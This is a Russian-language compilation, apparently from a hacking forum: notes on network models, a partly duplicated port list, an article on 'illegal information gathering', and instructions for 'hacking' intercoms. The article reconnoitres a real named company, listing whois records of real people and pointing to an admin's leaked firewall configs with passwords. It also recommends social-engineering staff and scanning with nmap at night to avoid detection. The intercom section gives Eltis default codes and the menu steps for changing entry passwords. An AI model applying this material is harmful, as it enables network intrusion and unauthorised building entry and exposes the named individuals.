протоколы. Модель osi использовалась на практике, но на сегодня она
обычно используется в качестве теоретического прототипа (это по мнению
спецов М$ ) для определения блоков, из которых должна состоять хорошая
система, реализующая сетевой протокол.

2. Реализация tcp/ip от фирмы microsoft соответствует
четырехуровневой модели, вместо семиуровневой модели osi. Эта
четырехуровневая модель имеет ту же функциональность, что и модель osi.
Она просто включает большее число функций в один уровень:

уровень приложения от m$ соответствует уровню приложения, уровню представления и уровню сеанса модели osi.

Уровень транспорта от m$ соответсвует аналогичному уровню модели osi.

Межсетевой уровень от m$ соответсвует уровню сети модели osi.

Уровень сетевого интерфейса от m$ соответсвует канальному и физическому уровням модели osi.


Описание всех портов:

1=tcp-mux - tcp port service multiplexer

2=compressnet - management utility

3=compressnet - compression process

5=rje - remote job entry

7=echo - echo

9=discard - discard

11=sysstat - system status

13=daytime - daytime

15=netstat - network status

17=qotd - quote of the day

18=msp - message send protocol

19=chargen - character generator

20=ftp-data - file transfer protocol [default data]

21=ftp - file transfer protocol [control]

22=ssh - ssh (secure shell) remote login protocol

23=telnet - telnet

24=pms - private mail system

25=smtp - simple mail transfer protocol

27=nsw-fe - nsw user system fe

29=msg-icp - messege icp

31=msg-auth - messege authentication

33=dsp - display support protocol

35=pps - private printer server

37=time - time

38=rap - route access protocol

39=rlp - resource location protocol

41=graphics - graphics

42=nameserver - host name server

43=whois - who is

44=mpm-flags - mpm flags protocol

45=mpm - message processing module [recv]

46=mpm-snd - mpm [default send]

47=ni-ftp - ni ftp (file transfer protocol)

48=auditd - digital audit daemon

49=bbn-login - login host protocol (tacacs)

50=re-mail-ck - remote mail checking protocol

51=la-maint - imp logical address maintenance

52=xns-time - xns time protocol

53=domain - domain name server

54=xns-ch - xns clearinghouse

55=isi-gl - isi graphics language

56=xns-auth - xns authentication

57=mtp - private terminal access

58=xns-mail - xns mail

59=pfs - private file system

60=unassigned

61=ni-mail - ni mail

62=acas - aca services

63=whois++ - whois++

64=covia - communications integrator (ci)

65=tacacs-ds - tacacs-database service

66=sql*net - oracle sql*net

67=bootps - bootstrap protocol server

68=bootpc - bootstrap protocol client

69=tftp - trivial file transfer protocol

70=gopher - gopher

71=netrjs-1 - remote job service

72=netrjs-2 - remote job service

73=netrjs-3 - remote job service

74=netrjs-4 - remote job service

75=pdos - private dial out service

76=deos - distributed external object store

77=rje - private rje (remote job entry) service

78=vettcp - vettcp

79=finger - finger

80=www-http - world wide web http (hyper text transfer protocol)

81=hosts2-ns - hosts2 name server

82=xfer - xfer utility

83=mit-ml-dev - mit ml device

84=ctf - common trace facility

85=mit-ml-dev - mit ml device

86=mfcobol - micro focus cobol

87=link - private terminal link

88=kerberos - kerberos

89=su-mit-tg - su/mit telnet gateway

90=dnsix - dnsix securit attribute token map

91=mit-dov - mit dover spooler

92=npp - network printing protocol

93=dcp - device control protocol

94=objcall - tivoli object dispatcher

95=supdup - supdup

96=dixie - dixie protocol specification

97=swift-rvf - swift remote virtural file protocol

98=tacnews - tac news

99=metagram - metagram relay

100=newacct - [unauthorized use]

101=hostnames - nic host name server

102=iso-tsap - iso-tsap class 0

103=x400 - x400

104=x400-snd - x400-snd

105=csnet-ns - mailbox name nameserver

106=3com-tsmux - 3com-tsmux

107=rtelnet - remote telnet service

108=snagas - sna gateway access server

109=pop - post office protocol - version 2

110=pop3 - post office protocol - version 3

111=sunrpc - sun remote procedure call

112=mcidas - mcidas data transmission protocol

113=ident - authentication service

114=audionews - audio news multicast

115=sftp - simple file transfer protocol

116=ansanotify - ansa rex notify

117=uucp-path - uucp path service

118=sqlserv - sql services

119=nntp - network news transfer protocol

120=cfdptkt - cfdptkt

121=erpc - encore expedited remote pro.call

122=smakynet - smakynet

123=ntp - network time protocol

124=ansatrader - ansa rex trader

125=locus-map - locus pc-interface net map ser

126=unitary - unisys unitary login

127=locus-con - locus pc-interface conn server

128=gss-xlicen - gss x license verification

129=pwdgen - password generator protocol

130=cisco-fna - cisco fnative

131=cisco-tna - cisco tnative

132=cisco-sys - cisco sysmaint

133=statsrv - statistics service

134=ingres-net - ingres-net service

135=rpc-locator - rpc (remote procedure call) location service

136=profile - profile naming system

137=netbios-ns - netbios name service

138=netbios-dgm - netbios datagram service

139=netbios-ssn - netbios session service

140=emfis-data - emfis data service

141=emfis-cntl - emfis control service

142=bl-idm - britton-lee idm

143=imap - interim mail access protocol v2

144=news - news

145=uaac - uaac protocol

146=iso-tp0 - iso-ip0

147=iso-ip - iso-ip

148=cronus - cronus-support

149=aed-512 - aed 512 emulation service

150=sql-net - sql-net

151=hems - hems

152=bftp - background file transfer program

153=sgmp - sgmp

154=netsc-prod - netsc

155=netsc-dev - netsc

156=sqlsrv - sql service

157=knet-cmp - knet/vm command/message protocol

158=pcmail-srv - pcmail server

159=nss-routing - nss-routing

160=sgmp-traps - sgmp-traps

161=snmp - snmp (simple network management protocol)

162=snmptrap - snmptrap (simple network management protocol)

163=cmip-man - cmip/tcp manager

164=cmip-agent - cmip/tcp agent

165=xns-courier - xerox

166=s-net - sirius systems

167=namp - namp

168=rsvd - rsvd

169=send - send

170=print-srv - network postscript

171=multiplex - network innovations multiplex

172=cl/1 - network innovations cl/1

173=xyplex-mux - xyplex

174=mailq - mailq

175=vmnet - vmnet

176=genrad-mux - genrad-mux

177=xdmcp - x display manager control protocol

178=nextstep - nextstep window server

179=bgp - border gateway protocol

180=ris - intergraph

181=unify - unify

182=audit - unisys audit sitp

183=ocbinder - ocbinder

184=ocserver - ocserver

185=remote-kis - remote-kis

186=kis - kis protocol

187=aci - application communication interface

188=mumps - plus five's mumps

189=qft - queued file transport

190=gacp - gateway access control protocol

191=prospero - prospero directory service

192=osu-nms - osu network monitoring system

193=srmp - spider remote monitoring protocol

194=irc - internet relay chat protocol

195=dn6-nlm-aud - dnsix network level module audit

196=dn6-smm-red - dnsix session mgt module audit redir

197=dls - directory location service

198=dls-mon - directory location service monitor

199=smux - smux

200=src - ibm system resource controller

201=at-rtmp - appletalk routing maintenance

202=at-nbp - appletalk name binding

203=at-3 - appletalk unused

204=at-echo - appletalk echo

205=at-5 - appletalk unused

206=at-zis - appletalk zone information

207=at-7 - appletalk unused

208=at-8 - appletalk unused

209=qmtp - the quick mail transfer protocol

210=z39.50 - ansi z39.50

211=914c/g - texas instruments 914c/g terminal

212=anet - atexsstr

213=ipx - ipx

214=vmpwscs - vm pwscs

215=softpc - insignia solutions

216=cailic - computer associates int'l license server

217=dbase - dbase unix

218=mpp - netix message posting protocol

219=uarps - unisys arps

220=imap3 - interactive mail access protocol v3

221=fln-spx - berkeley rlogind with spx auth

222=rsh-spx - berkeley rshd with spx auth

223=cdc - certificate distribution center

242=direct -

243=sur-meas - survey measurement

244=dayna -

245=link - link

246=dsp3270 - display systems protocol

247=subntbcst_tftp -

248=bhfhs -

256=rap -

257=set - secure electronic transaction

258=yak-chat - yak winsock personal chat

259=esro-gen - efficient short remote operations

260=openport -

261=nsiiops - iiop name service over tls/ssl

262=arcisdms -

263=hdap -

264=bgmp -

280=http-mgmt -

281=personal-link -

282=cableport-ax - cable port a/x

308=novastorbakcup - novastor backup

309=entrusttime -

310=bhmds -



[added=c18]1107378688[/added]

311=asip-webadmin - appleshare ip webadmin

312=vslmp -

313=magenta-logic -

314=opalis-robot -

315=dpsi -

316=decauth -

317=zannet -

321=pip -

344=pdap - prospero data access protocol

345=pawserv - perf analysis workbench

346=zserv - zebra server

501=stmf -

502=asa-appl-proto -

503=intrinsa -

504=citadel -

505=mailbox-lm -

506=ohimsrv -

507=crs -

508=xvttp -

509=snare -

510=fcp - firstclass protocol

511=passgo -

512=exec - remote process execution

513=login - remote login via telnet;

514=shell - automatic remote process execution

515=printer - printer spooler

516=videotex -

517=talk -

518=ntalk -

519=utime - unix time

520=efs - extended file server

521=ripng -

522=ulp -

523=ibm-db2 -

524=ncp -

525=timed - time server 526=tempo - newdate

527=stx - stock ixchange

528=custix - customer ixchange

529=irc-serv -

530=courier - rpc

531=conference - chat

532=netnews - readnews

533=netwall - emergency broadcasts

534=mm-admin - megamedia admin

535=iiop -

536=opalis-rdv -

537=nmsp - networked media streaming protocol

538=gdomap -

539=apertus-ldp - apertus technologies load determination

540=uucp - uucpd (unix to unix copy)

541=uucp-rlogin - uucp (unix to unix copy) - rlogin (remote login)

542=commerce -

543=klogin -

544=kshell - krcmd

545=appleqtcsrvr - apple qtcsrvr

546=dhcp-client - dhcp (dynamic host configuration protocol) client

547=dhcp-server - dhcp (dynamic host configuration protocol) server

548=afpovertcp - afp over tcp

549=idfp -

550=new-rwho - new-who

551=cybercash - cybercash

552=deviceshare - deviceshare

553=pirp - pirp

554=rtsp - real time stream control protocol

555=dsf -

556=remotefs - rfs (remote file system) server

557=openvms-sysipc - openvms-sysipc

558=sdnskmp - sdnskmp

559=teedtap - teedtap

560=rmonitor - rmonitord

561=monitor -

562=chshell - chcmd

563=snews - snews

564=9pfs - plan 9 file service

565=whoami - whoami

566=streettalk - streettalk

567=banyan-rpc - banyan-rpc

568=ms-shuttle - microsoft shuttle

569=ms-rome - microsoft rome

570=meter - demon

571=meter - udemon

572=sonar - sonar

573=banyan-vip - banyan-vip

574=ftp-agent - ftp software agent system

575=vemmi - vemmi

576=ipcd -

577=vnas -

578=ipdd -

579=decbsrv -

580=sntp-heartbeat -

581=bdp - bundle discovery protocol

582=scc-security -

583=philips-vc - philips video-conferencing

584=keyserver -

585=imap4-ssl - imap4+ssl

586=password-chg -

587=submission -

588=cal -

589=eyelink -

590=tns-cml -

591=http-alt - filemaker, inc. - http alternate

592=eudora-set -

593=http-rpc-epmap - http rpc ep map

594=tpip -

595=cab-protocol -

596=smsd -

597=ptcnameservice - ptc name service

598=sco-websrvrmg3 - sco web server manager 3

599=acp - aeolon core protocol

600=ipcserver - sun ipc server

606=urm - cray unified resource manager

607=nqs - nqs

608=sift-uft - sender-initiated/unsolicited file transfer

609=npmp-trap - npmp-trap

610=npmp-local - npmp-local

611=npmp-gui - npmp-gui

628=qmqp - qmail quick mail queueing

633=servstat - service status update (sterling software)

634=ginad - ginad

635=mount - nfs mount service

636=ldapssl - ldap over ssl

640=pcnfs - pc-nfs dos authentication

650=bwnfs - bw-nfs dos authentication

666=doom - doom id software

674=port

704=elcsd - errlog copy/server daemon

709=entrustmanager - entrustmanager

729=netviewdm1 - ibm netview dm/6000 server/client

730=netviewdm2 - ibm netview dm/6000 send/tcp

731=netviewdm3 - ibm netview dm/6000 receive/tcp

737=sometimes-rpc2 - rusersd on my openbsd box

740=netcp - netscout control protocol

741=netgw - netgw

742=netrcs - network based rev. cont. sys.

744=flexlm - flexible license manager

747=fujitsu-dev - fujitsu device control

748=ris-cm - russell info sci calendar manager

749=kerberos-adm - kerberos administration

750=kerberos-sec -

751=kerberos_master -

752=qrh -

753=rrh -

754=kbr5_prop -

758=nlogin -

759=con -

760=ns -

761=rxe -

762=quotad -

763=cycleserv -

764=omserv -

765=webster -

767=phonebook - phone

769=vid -

770=cadlock -

771=rtip -

772=cycleserv2 -

773=submit -

774=rpasswd -

775=entomb -

776=wpages -

780=wpgs -

781=hp-collector - hp performance data collector

782=hp-managed-node - hp performance data managed node

783=hp-alarm-mgr - hp performance data alarm manager

786=concert - concert

799=controlit -

800=mdbs_daemon -

801=device -

808=port

871=supfilesrv = sup server

888=cddatabase - cddatabase

901=port

911=dark shadow

989=ftps-data - ftp over tls/ssl

990=ftp control tls/ssl

992=telnets - telnet protocol over tls/ssl

993=imaps - imap4 protocol over tls/ssl

995=pop3s - pop3 (post office protocol) over tls/ssl

996=vsinet - vsinet

997=maitrd -

998=busboy -

999=puprouter -

347=fatserv - fatmen server

348=csi-sgwp - cabletron management protocol

349=mftp -

350=matip-type-a - matip type a

351=matip-type-b - matip type b or bhoetty

352=dtag-ste-sb - dtag, or bhoedap4

353=ndsauth -

354=bh611 -

355=datex-asn -

356=cloanto-net-1 - cloanto net 1

357=bhevent -

358=shrinkwrap -

359=tenebris_nts - tenebris network trace service

360=scoi2odialog -

361=semantix -

362=srssend - srs send

363=rsvp_tunnel -

364=aurora-cmgr -

365=dtk - deception tool kit

366=odmr -

367=mortgageware -

368=qbikgdp -

369=rpc2portmap -

370=codaauth2 -

371=clearcase - clearcase

372=ulistserv - unix listserv

373=legent-1 - legent corporation

374=legent-2 - legent corporation

375=hassle - hassle

376=nip - amiga envoy network inquiry proto

377=tnetos - nec corporation

378=dsetos - nec corporation

379=is99c - tia/eia/is-99 modem client

380=is99s - tia/eia/is-99 modem server

381=hp-collector - hp performance data collector

382=hp-managed-node - hp performance data managed node

383=hp-alarm-mgr - hp performance data alarm manager

384=arns - a remote network server system

385=ibm-app - ibm application 386=asa - asa message router object def.

387=aurp - appletalk update-based routing pro.

388=unidata-ldm - unidata ldm version 4

389=ldap - lightweight directory access protocol

390=uis - uis

391=synotics-relay - synoptics snmp relay port

392=synotics-broker - synoptics port broker port

393=dis - data interpretation system

394=embl-ndt - embl nucleic data transfer

395=netcp - netscout control protocol

396=netware-ip - novell netware over ip

397=mptn - multi protocol trans. net.

398=kryptolan - kryptolan

399=iso-tsap-c2 - iso transport class 2 non-control over tcp

400=work-sol - workstation solutions

401=ups - uninterruptible power supply

402=genie - genie protocol

403=decap - decap

404=nced - nced

405=ncld - ncld

406=imsp - interactive mail support protocol

407=timbuktu - timbuktu

408=prm-sm - prospero resource manager sys. man.

409=prm-nm - prospero resource manager node man.

410=decladebug - decladebug remote debug protocol

411=rmt - remote mt protocol

412=synoptics-trap - trap convention port

413=smsp - smsp

414=infoseek - infoseek

415=bnet - bnet

416=silverplatter - silverplatter

417=onmux - onmux

418=hyper-g - hyper-g

419=ariel1 - ariel

420=smpte - smpte

421=ariel2 - ariel

422=ariel3 - ariel

423=opc-job-start - ibm operations planning and control start

424=opc-job-track - ibm operations planning and control track

425=icad-el - icad

426=smartsdp - smartsdp

427=svrloc - server location

428=ocs_cmu - ocs_cmu

429=ocs_amu - ocs_amu

430=utmpsd - utmpsd

431=utmpcd - utmpcd

432=iasd - iasd

433=nnsp - nnsp

434=mobileip-agent - mobileip-agent

435=mobilip-mn - mobilip-mn

436=dna-cml - dna-cml

437=comscm - comscm

438=dsfgw - dsfgw

439=dasp - dasp

440=sgcp - sgcp

441=decvms-sysmgt - decvms-sysmgt

442=cvc_hostd - cvc_hostd

443=https - https (hyper text transfer protocol secure) - ssl (secure

socket layer)

444=snpp - simple network paging protocol

445=microsoft-ds - microsoft-ds

446=ddm-rdb - ddm-rdb

447=ddm-dfm - ddm-rfm

448=ddm-byte - ddm-byte



[added=c18]1107376220[/added]

449=as-servermap - as server mapper

450=tserver - tserver

451=sfs-smp-net - cray network semaphore server

452=sfs-config - cray sfs config server

453=creativeserver - creativeserver

454=contentserver - contentserver

455=creativepartnr - creativepartnr

456=macon-tcp - macon-tcp

457=scohelp - scohelp

458=appleqtc - apple quick time

459=ampr-rcmd - ampr-rcmd

460=skronk - skronk

461=datasurfsrv - datarampsrv

462=datasurfsrvsec - datarampsrvsec

463=alpes - alpes

464=kpasswd - kpasswd

465=ssmtp - ssmtp

466=digital-vrc - digital-vrc

467=mylex-mapd - mylex-mapd

468=photuris - proturis

469=rcp - radio control protocol

470=scx-proxy - scx-proxy

471=mondex - mondex

472=ljk-login - ljk-login

473=hybrid-pop - hybrid-pop

474=tn-tl-w1 - tn-tl-w1

475=tcpnethaspsrv - tcpnethaspsrv

476=tn-tl-fd1 - tn-tl-fd1

477=ss7ns - ss7ns

478=spsc - spsc

479=iafserver - iafserver

480=iafdbase - iafdbase

481=ph - ph service

482=bgs-nsi - bgs-nsi

483=ulpnet - ulpnet

484=integra-sme - integra software management environment

485=powerburst - air soft power burst

486=avian - avian

487=saft - saft

488=gss-http - gss-http

489=nest-protocol - nest-protocol

490=micom-pfs - micom-pfs

491=go-login - go-login

492=ticf-1 - transport independent convergence for fna

493=ticf-2 - transport independent convergence for fna

494=pov-ray - pov-ray

495=intecourier -

496=pim-rp-disc -

497=dantz -

498=siam -

499=iso-ill - iso ill protocol

500=isakmp -



[added=c18]1107378901[/added]

501=stmf -

502=asa-appl-proto -

503=intrinsa -

504=citadel -

505=mailbox-lm -

506=ohimsrv -

507=crs -

508=xvttp -

509=snare -

510=fcp - firstclass protocol

511=passgo -

512=exec - remote process execution

513=login - remote login via telnet;

514=shell - automatic remote process execution

515=printer - printer spooler

516=videotex -

517=talk -

518=ntalk -

519=utime - unix time

520=efs - extended file server

521=ripng -

522=ulp -

523=ibm-db2 -

524=ncp -

525=timed - time server 526=tempo - newdate

527=stx - stock ixchange

528=custix - customer ixchange

529=irc-serv -

530=courier - rpc

531=conference - chat

532=netnews - readnews

533=netwall - emergency broadcasts

534=mm-admin - megamedia admin

535=iiop -

536=opalis-rdv -

537=nmsp - networked media streaming protocol

538=gdomap -

539=apertus-ldp - apertus technologies load determination

540=uucp - uucpd (unix to unix copy)

541=uucp-rlogin - uucp (unix to unix copy) - rlogin (remote login)

542=commerce -

543=klogin -

544=kshell - krcmd

545=appleqtcsrvr - apple qtcsrvr

546=dhcp-client - dhcp (dynamic host configuration protocol) client

547=dhcp-server - dhcp (dynamic host configuration protocol) server

548=afpovertcp - afp over tcp

549=idfp -

550=new-rwho - new-who

551=cybercash - cybercash

552=deviceshare - deviceshare

553=pirp - pirp

554=rtsp - real time stream control protocol

555=dsf -

556=remotefs - rfs (remote file system) server

557=openvms-sysipc - openvms-sysipc

558=sdnskmp - sdnskmp

559=teedtap - teedtap

560=rmonitor - rmonitord

561=monitor -

562=chshell - chcmd

563=snews - snews

564=9pfs - plan 9 file service

565=whoami - whoami

566=streettalk - streettalk

567=banyan-rpc - banyan-rpc

568=ms-shuttle - microsoft shuttle

569=ms-rome - microsoft rome

570=meter - demon

571=meter - udemon

572=sonar - sonar

573=banyan-vip - banyan-vip

574=ftp-agent - ftp software agent system

575=vemmi - vemmi

576=ipcd -

577=vnas -

578=ipdd -

579=decbsrv -

580=sntp-heartbeat -

581=bdp - bundle discovery protocol

582=scc-security -

583=philips-vc - philips video-conferencing

584=keyserver -

585=imap4-ssl - imap4+ssl

586=password-chg -

587=submission -

588=cal -

589=eyelink -

590=tns-cml -

591=http-alt - filemaker, inc. - http alternate

592=eudora-set -

593=http-rpc-epmap - http rpc ep map

594=tpip -

595=cab-protocol -

596=smsd -

597=ptcnameservice - ptc name service

598=sco-websrvrmg3 - sco web server manager 3

599=acp - aeolon core protocol

600=ipcserver - sun ipc server

606=urm - cray unified resource manager

607=nqs - nqs

608=sift-uft - sender-initiated/unsolicited file transfer

609=npmp-trap - npmp-trap

610=npmp-local - npmp-local

611=npmp-gui - npmp-gui

628=qmqp - qmail quick mail queueing

633=servstat - service status update (sterling software)

634=ginad - ginad

635=mount - nfs mount service

636=ldapssl - ldap over ssl

640=pcnfs - pc-nfs dos authentication

650=bwnfs - bw-nfs dos authentication

666=doom - doom id software

674=port

704=elcsd - errlog copy/server daemon

709=entrustmanager - entrustmanager

729=netviewdm1 - ibm netview dm/6000 server/client

730=netviewdm2 - ibm netview dm/6000 send/tcp

731=netviewdm3 - ibm netview dm/6000 receive/tcp

737=sometimes-rpc2 - rusersd on my openbsd box

740=netcp - netscout control protocol

741=netgw - netgw

742=netrcs - network based rev. cont. sys.

744=flexlm - flexible license manager

747=fujitsu-dev - fujitsu device control

748=ris-cm - russell info sci calendar manager

749=kerberos-adm - kerberos administration

750=kerberos-sec -

751=kerberos_master -

752=qrh -

753=rrh -

754=kbr5_prop -

758=nlogin -

759=con -

760=ns -

761=rxe -

762=quotad -

763=cycleserv -

764=omserv -

765=webster -

767=phonebook - phone

769=vid -

770=cadlock -

771=rtip -

772=cycleserv2 -

773=submit -

774=rpasswd -

775=entomb -

776=wpages -

780=wpgs -

781=hp-collector - hp performance data collector

782=hp-managed-node - hp performance data managed node

783=hp-alarm-mgr - hp performance data alarm manager

786=concert - concert

799=controlit -

800=mdbs_daemon -

801=device -

808=port

871=supfilesrv = sup server

888=cddatabase - cddatabase

901=port

911=dark shadow

989=ftps-data - ftp over tls/ssl

990=ftp control tls/ssl

992=telnets - telnet protocol over tls/ssl

993=imaps - imap4 protocol over tls/ssl

995=pop3s - pop3 (post office protocol) over tls/ssl

996=vsinet - vsinet

997=maitrd -

998=busboy -

999=puprouter -



Нелегальный сбор информации в сети
Введение.

Никакой взлом не обходиться без предварительного сбора информации и данных. И чем больше данных, тем больше шанс удачно провести взлом или атаку. Начнем с того, что собирать информацию будем, не выходя из-за компьютера. Хотя для получения информации можно воспользоваться и другими не менее эффективными методами это попасть на территорию жертвы: порыться в мусоре, съездить на собеседование или устроиться на работу.
Для сбора информации никаких особых инструментов и знаний нам не потребуется, только умение пользоваться поисковиками и анализировать полученную информацию. Также хочу заметить, что перед тем как заняться взломом мы должны поставить четкую цель чего мы хотим.
В качестве примера возьмем сайт www.ocv.ru

Предварительный анализ.

На данный момент у любой уважающей себя организации есть свой сайт или просто страничка в Интернете, в которой содержится информация о деятельности организации, продуктах или услугах, которые она предоставляет и контактная информация (телефоны, адреса, е-меил и пр.)
Для начала уже не так уж мало.
Теперь нужно определиться, где расположен данный сайт или страничка: в локальной сети самой организации или у хостера. На моей практике я не встречал, что организация размещает свой сайт на бесплатных серверах, таких как narod.ru и пр. Но в жизни нет ничего невозможного и даже на таких, сайтах будет указан реальный адрес организации. Если организация пользуется именно таким сервером, то это будет видно из названия сайта, в котором будет фигурировать доменное имя третьего уровня. Например, oursite.narod.ru.
Но вернемся к нашим баранам. Нам необходимо узнать IP адрес сайта для этого можно воспользоваться командой ping.
Ping www.ocv.ru
В результате получим:
Обмен пакетами с ocv.ru [217.72.145.186] по 32 байт:
Ответ от 217.72.145.186: число байт=32 время=12мс TTL=246
Ответ от 217.72.145.186: число байт=32 время=14мс TTL=246
Ответ от 217.72.145.186: число байт=32 время=15мс TTL=246
Ответ от 217.72.145.186: число байт=32 время=14мс TTL=246

Но в этом есть один недостаток, организация может иметь зеркала своего сайта (чтобы в случае отказа одного сервера сайт продолжал работать на другом без отрыва от производства) или на сервере запрещены ICMP пакеты. Тогда воспользуемся командой nslookup.

Nslookup www.ocv.ru
В результате получим:

Name: www.ocv.ru
Address: 217.72.145.186
Дальше выясним кому принадлежат данные IP адреса. Заходим на www.ripe.net вбиваем туда IP адрес и получаем информацию:

inetnum: 217.72.145.128 - 217.72.145.191
netname: BESTCOM-CLIENTS
descr: Various clients of Best Telecom in Kulakov 17
country: RU
admin-c: AREG-RIPE
tech-c: BHM-RIPE
status: ASSIGNED PA
mnt-by: BESTCOM-MNT
source: RIPE # Filtered
role: Bestcom Hostmaster
address: Best Telecommunications Ltd.
address: Kulakov side-st. 11, off. 314
address: Moscow 129329, RU
phone: +7 (495) 787-4776
fax-no: +7 (495) 287-6762
abuse-mailbox: abuse@bestcom.ru
remarks: ------------------------------------------------
remarks: NOC working hours:
remarks: 10am-7pm MSK/MSD (GMT+3/+4) working days
remarks: ------------------------------------------------
remarks: Contact addresses by category:
remarks: Routing: noc@bestcom.ru
remarks: Domains/IP delegation: hostmaster@bestcom.ru
remarks: SPAM/UCE: abuse@bestcom.ru
remarks: Scans/Hacking attempts: security@bestcom.ru
remarks: Mail: postmaster@bestcom.ru
remarks: ------------------------------------------------
admin-c: AREG-RIPE
admin-c: TRZ4-RIPE
admin-c: YVV2-RIPE
tech-c: MOLL-RIPE
nic-hdl: BHM-RIPE
remarks: $Id: BHM-RIPE,v 1.6 2007/01/17 12:42:46 glebius Exp $
mnt-by: BESTCOM-MNT
source: RIPE # Filtered
person: Areg R Zakoyan
address: Best Telecommunications Ltd.
address: Kulakov per. 11
address: Moscow 129329
address: Russia
remarks: phone: +7 095 787 4776
phone: +7 495 787 4776
nic-hdl: AREG-RIPE
mnt-by: BESTCOM-MNT
source: RIPE # Filtered
remarks: modified for Russian phone area changes
% Information related to '217.72.144.0/20AS29388'
route: 217.72.144.0/20
descr: BESTCOM
origin: AS29388
mnt-by: BESTCOM-MNT
source: RIPE # Filtered

Изучив полученную информацию выясняем, что сайт «лежит» на хостинге и кроме самого сайта мы не получим никакой информации.

А дальше все очень просто открываем браузер, загружаем ya.ru, google.ru, rambler.ru и aport.ru в поиск вбиваем @ocv.ru в результате получаем достаточно интересную информацию.
Большинство сотрудников привыкает к рабочему е-мейлу, что начинают использовать его в личных целях. Регистрируясь на форумах, досках объявлениях и пр. Таким образом, можно получить информации о пристрастиях сотрудников их увлечениях и проблемах. Так же можно персонально поискать информацию о сотруднике тем самым увеличить базу знаний или применить СИ. По статистике обычный человек, если конечно он не параноик, использует легко запоминающиеся пароли, которые относятся к его образу жизни или личности и паролей этих один два. Но это уже выходит за рамки данной статьи

В случае с ocv.ru я обнаружил информацию о проблеме админа с PIX http://www.certification.ru/cgi-bin/forum....ad&id=22014 где он выкладывает конфиги PIX с паролями и пр. так же из этих конфигов мы находим IP адрес офиса. 212.45.3.160. Опять заходим на www.ripe.net вбиваем туда это IP
В результате получаем следующую информацию:
inetnum: 212.45.3.160 - 212.45.3.167
netname: COMCOR-ZHELDOR
descr: Zheldorconsulting, LTD.
descr: Moscow Head Quater
descr: 10, 3d Mytishinskaya str., Moscow, Russia
country: RU
admin-c: LVG2-RIPE
tech-c: VGF2-RIPE
tech-c: VAT6-RIPE
tech-c: LVG2-RIPE
status: ASSIGNED PA
mnt-by: AS8732-MNT
source: RIPE # Filtered
person: Vitaliy G. Lesnichy
address: 10, 3d Mytishinskaya str., Moscow, Russia
remarks: phone: +7 095 7776644
phone: +7 495 7776644
e-mail: patrol@zeldor.ru
nic-hdl: LVG2-RIPE
mnt-by: AS8732-MNT
source: RIPE # Filtered
remarks: modified for Russian phone area changes
person: Vladimir A. Trudonoshin
address: Russia
address: 127051 Moscow
address: Neglinnaya, 17/2
address: COMCOR
phone: +7 095 2507454
fax-no: +7 095 2507455
e-mail: trud@comcor.ru
nic-hdl: VAT6-RIPE
source: RIPE # Filtered
person: Vladimir G. Fedoruk
address: Russia
address: 127051 Moscow
address: Neglinnaya, 17/2
address: COMCOR
phone: +7 095 2507454
fax-no: +7 095 2507455
e-mail: fedoruk@comcor.ru
nic-hdl: VGF2-RIPE
source: RIPE # Filtered
% Information related to '212.45.0.0/19AS8732'
route: 212.45.0.0/19
descr: comcor.ru
origin: AS8732
mnt-by: AS8732-MNT
source: RIPE # Filtered

Изучив информацию и сопоставив адреса (не сетевые) получаем что 212.45.3.160 - 212.45.3.167 диапазон офисной сетки.

В случае, когда сайт весит в локальной сетке действий описанных выше конечно можно и не выполнять. А приступить к сканированию. Но лучше не полениться и поискать интересную информацию.

Таким образом, используя только поисковые сервера, можно получить достаточно интересной информации (почтовые ящики, информацию о сотрудниках, конфиги и пр.). При этом не светя свой IP и не вызывая подозрения у админа. Это даже не хакерство.

2 Сканирование

Найдя IP адреса офиса будем собирать информацию о серверах. Я не буду заострять внимание на самом методе сканирования и об инструментариях и уж точно не буду на примере ocv показывать взлом =). Просто расскажу приемах сбора информации.
Время сканирования серверов. Наверно фактор пустяковый но все же думаю, что стоит его затронуть. Когда лучше сканировать? Тут два варианта либо ночью когда админ спить либо в самый пик рабочего дня. Первый вариант хорош тем, что канал свободный и админ только утром обнаружит, что сервера сканировали, но ничего уже не сможет активно сделать, в лучшем случае забанить IP адреса откуда происходило сканирование, но все же будут следы сканирования и админ насторожиться начнет проверять перепроверять все. В пик рабочего дня админ может и не заметит, что его сервера сканируют, но опять же есть вариант, что он заметит попытки сканирования и забанит IP адрес. Но только в этом случае бан адреса произойдет во время сканирования, а не после.

Сканеры. Тут уже на любителя кто чем привык пользоваться. И опять же у каждого сканера есть свои плюсы есть свои минусы. Сканеры сетевой безопасности (SSS XSpider) хороши тем что собирают полную информацию показывают какие ошибки присутствуют и как их можно использовать, но при этом очень медлительны. Я бы советовал пользоваться nmap. Вот пример использования сканера: nmap –sS –sV –O -P0 oursite.ru.
После того как сканер завершит свою работу мы получим результат. И опять начинаем искать в Интернете информацию по сервисам, которые запущенны на сканируемом сервере. Что нужно искать? Искать нужно сплоиты, баги и фичи, для конкретных версий сервисов.
О багах можно смотреть на сайте производителя, очень часто там пишут какие ошибки были исправлены какие нет. Сплоиты также ищутся через поисковик.
О методах взлома много информации в Интеренте =)

Заключение.
В заключении могу сказать только, то что терпение и труд всех заметелят.

З.Ы. Как я уже говорил меня не бить =)



Взлом домофона
Стандартные установки:

(Внимание! Коды доступа подходят лишь в случае, если установщики поленились и не сменили пароль установленный по умолчанию. Такое встречается довольно часто.)

Eltis домофоны

изначально стоит код по умолчанию "1234", но любая фирма при установке домофона, его, естественно, меняет на свой, и узнать его практически невозможно. Чтобы войти в режим ввода пароля необходимо удерживать:
1) любую цифровую клавишу в течение 7 секунд (меню "code"- меню для работы над квартирами, программирование ключей)
2) Кнопку "в" - удерживать столько же (меню "sys"- общие параметры, запрещение/разрешение кодов- на это меню довольно часто подходит 1234, у меня раз 50 подходил.)

Расшифровка операций меню:
1. Вызов системного меню 'sys'.
1) Нажать кнопку 'в' и держать 7 сек.
2) После надписи 'SYS' на дисплее ввести системный пароль (тупые ленивые системщики часто не утруждают себя сменой пароля, который стоит по умолчанию- 1234)
2.1) Если ввод правильный, домофон покажет прошивку вида ' 6_7х', где х- номер прошивки, после загрузится меню '_FUNC'.

Из него нажимать:
'1'- появится 'PAS', после поле ввода для смены старого пароля входа в это меню (набрать 4 цифры и домофон вернется в '_FUNC'
'2'- меню '_ LОС' для включения/выключения общего пароля входа (кнопки 1/0 соответственно)
'3'- меню '_ dig' для смены общего пароля входа. Нажимайте 3, 4 или 5, появится '____C'.

В зависимости от нажатой кнопки, вы можете установить новый пароль, соответственно, 3, 4 или 5 значный. (наберите новый пароль)
